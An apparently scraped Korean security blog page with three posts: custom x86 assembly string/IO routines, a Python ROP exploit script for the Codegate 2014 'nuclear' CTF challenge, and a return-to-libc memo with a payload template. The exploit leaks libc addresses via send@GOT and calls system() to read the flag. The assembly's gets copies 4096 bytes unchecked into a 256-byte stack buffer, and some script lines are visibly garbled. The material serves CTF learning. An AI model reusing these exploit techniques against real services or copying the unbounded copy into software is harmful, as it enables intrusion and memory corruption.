[Assembly] strlen, strcpy, puts, gets

Basic Programming/Assembly 2015. 10. 11. 03:45

customio.inc

.set stdin, 0x00
.set stdout, 0x01

.set syscall_read, 0x3
.set syscall_write, 0x4

.text
.globl strlen
.globl strcpy
.globl puts
.globl gets

strlen:
    push %ebp
    mov %esp, %ebp
    push %esi
    push %ecx
    xor %ecx, %ecx
    mov 0x8(%ebp), %esi
    .strlen_lp:
        movb (%esi), %al
        cmpb $0x0, %al
        je .strlen_lp_fin
        inc %esi
        inc %ecx
        jmp .strlen_lp
    .strlen_lp_fin:
    mov %ecx, %eax
    pop %ecx
    pop %esi
    leave
    ret $0x4

strcpy:
    push %ebp
    mov %esp, %ebp
    push %edi
    push %esi
    push %ecx
    xor %ecx, %ecx
    mov 0x8(%ebp), %edi
    mov 0xc(%ebp), %esi
    .strcmp_lp:
        cmpb $0x0, (%esi)
        movb $0x0, (%edi)
        je .strcmp_lp_fin
        movb (%esi), %al
        movb %al, (%edi)
        inc %esi
        inc %edi
        inc %ecx
        jmp .strcmp_lp
    .strcmp_lp_fin:
    mov %ecx, %eax
    pop %ecx
    pop %esi
    pop %edi
    leave
    ret $0x4

puts:
    push %ebp
    mov %esp, %ebp
    push %ebx
    push %ecx
    push %edx
    mov 0x8(%ebp), %ecx
    push %ecx
    call strlen
    mov %eax, %edx
    mov $stdout, %ebx
    mov $syscall_write, %eax
    int $0x80
    mov %ecx, %eax
    pop %edx
    pop %ecx
    pop %ebx
    leave
    ret $0x4

gets:
    push %ebp
    mov %esp, %ebp
    sub $0x1000, %esp
    push %esi
    push %ebx
    push %ecx
    push %edx
    mov $0x1000, %edx
    lea -0x1000(%ebp), %ecx
    mov $stdin, %ebx
    mov $syscall_read, %eax
    int $0x80
    mov 0x8(%ebp), %eax
    push %ecx
    push %eax
    call strcpy
    pop %edx
    pop %ecx
    pop %ebx
    pop %esi
    leave
    ret $0x4


main.s

.text
.include "customio.inc"
.globl main

main:
    push %ebp
    mov %esp, %ebp
    push %edx
    sub $0x100, %esp
    lea -0x100(%ebp), %edx
    push $string
    call puts
    push %edx
    call gets
    push %edx
    call puts
    xor %eax, %eax
    pop %edx
    leave
    ret

.section .rodata
string:
    .string "Input : "
저작자표시 비영리 동일조건
Posted by RevDev
,

[Payload/Codegate 2014 Junior] Pwnable - 'nuclear'

Security/CTF 2015. 10. 6. 16:13

Codegate 2014 Junior - Pwnable 300

-Remote Return Oriented Programming-



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#!/usr/bin/python
#-*-coding:utf-8-*-
 
import socket
import struct
import time
 
#Endian Translator
= lambda x : struct.pack("<L", x)
up = lambda x : struct.unpack("<L", x)
 
#PLT_GOT Addresses
send_plt = 0x08048900
send_got = 0x804b07c
recv_plt = 0x080488e0
recv_got = 0x0804b074
 
#Libc Addresses
recv_addr = None
system_addr = None
 
#Gadget/F_Stack Addresses
start_routine  = 0x08048b5b
ppppr = 0x0804917c
data_addr = 0x0804b088
 
#Misc
offset_send_system = 0xfb0 #Ubuntu 15.04 Vivid
passcode = None
 
print '''
[!] Codegate 2014 Nuclear Exploit [!]
~ By RevDev
~ Python 2.7
~ Local Exploit
'''
 
print "[!] Establishing Connection [!]"
= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1'1129))
print s
print ''
 
print "[!] Getting Passcode [!]"
 
s.recv(1024)
s.send("target\n")
s.recv(1024)
s.send("1.1/1.1\n")
s.recv(1024)
s.send("A"*512+"\n")
s.recv(1024)
passcode = s.recv(1024)
passcode = passcode[passcode.index('?', passcode.index('?')+1)+1:]
passcode = passcode.split("\n")[0]
print "Passcode : %s\n" %passcode
 
print "[!] Leaking Libc Function Address [!]"
s.send("launch\n")
s.recv(1024)
time.sleep(0.3)
s.send(passcode+"\n")
time.sleep(0.3)
s.recv(1024)
payload = "A"*528 + p(send_plt) + p(ppppr) + p(4+ p(send_got) + p(4+ p(0+ p(start_routine) + "\x90"*4 + p(4)
s.send(payload + "\n")
send_addr = up(s.recv(1024))
system_addr = int(send_addr[0]) + offset_send_system
print "_Send Address : 0x%x" %send_addr
print "_System Address : 0x%x\n" %system_addr
 
print "[!] Sending Exploit [!]"
payload = "A"*528 + p(recv_plt) + p(ppppr) + p(4+ p(data_addr) + p(13+ p(0+ p(system_addr) + "\x90"*4 + p (data_addr)
s.send(payload + "\n")
s.recv(1024)
s.send("cat key >&4\n"+"\x00")
s.recv(1024)
print "Flag : %s" %s.recv(1024)
s.close()
cs


저작자표시 비영리 동일조건

'Security > CTF' 카테고리의 다른 글

[Write-Up/Codegate 2016 Junior] Pre-Qual WriteUp  (0) 2016.04.25
[Payload/Layer 7 CTF 2015] Pwnable - 'Spil..Spli....SPPPPPIILL'  (0) 2015.11.05
[Write-Up/Inc0gnito CTF 2015] Reversing - Reversing  (0) 2015.08.26
[Write-Up/Inc0gnito CTF 2015] Reversing - Anti Hexray  (0) 2015.08.26
[Write-Up/Inc0gnito CTF 2015] Forensic - 유출 추정  (0) 2015.08.23
Posted by RevDev
,

[Library / Pwnable] Return To Libc Memo

Repository/Library 2015. 8. 30. 21:14

[System_Addr - GDB]

>b *func

>r

>p system


[Export Exploit_Addr 1]
int main()
{
        unsigned int addr;
        printf("\nSystem Addr : 0x");
        scanf("%x",&addr);
        while(memcmp((void*)addr,"/bin/sh",8))addr++;
        printf("\n<Calculated Result>\nExploit Addr : 0x%x\n\n",addr);

        return 0;

}


[Export Exploit_Addr 2]

>find &system, +99999999, /bin/sh


[Payload Example]

./filename `python -c 'print "\x90"*SizeOfBuf+"System_Addr"+"\x90"*4+"Exploit_Addr"'`


저작자표시 비영리 동일조건

'Repository > Library' 카테고리의 다른 글

[Library / Pwnable] Buffer Overflow Memo  (0) 2015.08.30
Posted by RevDev
,

티스토리툴바